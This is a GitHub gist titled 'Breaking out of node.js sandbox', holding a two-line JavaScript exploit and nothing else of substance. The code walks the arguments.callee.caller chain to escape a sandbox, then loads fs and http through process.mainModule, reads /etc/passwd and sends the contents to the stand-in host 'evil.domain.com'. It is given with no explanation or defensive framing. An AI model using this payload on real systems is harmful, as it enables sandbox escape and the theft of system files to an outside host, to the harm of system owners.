Create a gist now

Instantly share code, notes, and snippets.

Breaking out of node.js sandbox
var func = arguments.callee.caller.arguments.callee.caller.arguments.callee.caller.arguments.callee.arguments.callee.caller.arguments.callee.caller;
func.call(func, "var fs = process.mainModule.require('fs');var http = process.mainModule.require('http');var req = http.request({host: 'evil.domain.com'}); req.write(fs.readFileSync('/etc/passwd').toString());req.end();");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment